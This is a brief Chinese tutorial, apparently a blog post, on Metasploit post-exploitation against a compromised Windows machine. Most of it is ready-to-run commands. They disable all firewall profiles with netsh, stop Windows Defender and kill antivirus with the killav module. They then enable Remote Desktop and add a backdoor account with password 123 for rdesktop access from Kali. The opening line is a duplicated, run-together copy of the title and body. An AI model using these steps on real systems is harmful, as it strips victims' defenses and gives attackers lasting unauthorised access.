远程登录防火墙使用什么登录方式(Msf关闭防火墙以及杀软)
远程登录防火墙使用什么登录方式(Msf关闭防火墙以及杀软)使用后渗透模块 关闭杀软run killav //关闭杀毒软件输入shell 进入 cmdshell里面net stop windefend关闭成功
要system权限
关闭防火墙
netsh advfirewall set allprofiles state off
关闭denfender
输入shell 进入 cmdshell里面
net stop windefend
关闭成功
run killav //关闭杀毒软件
使用后渗透模块 关闭杀软
run post/windows/manage/killav
我靶机上是启动了360的 脚本探测不到360的存在,显示没有杀软进程
远程桌面登录
run post/windows/manage/enable_rdp
再来到靶机看看
远程桌面已经开启
也可以使用getgui 来开启 远程桌面
Run getgui -e
添加用户
run getgui -u 123 -p 123
然后就可以再kali里面七档rdesktop开启远程桌面连接了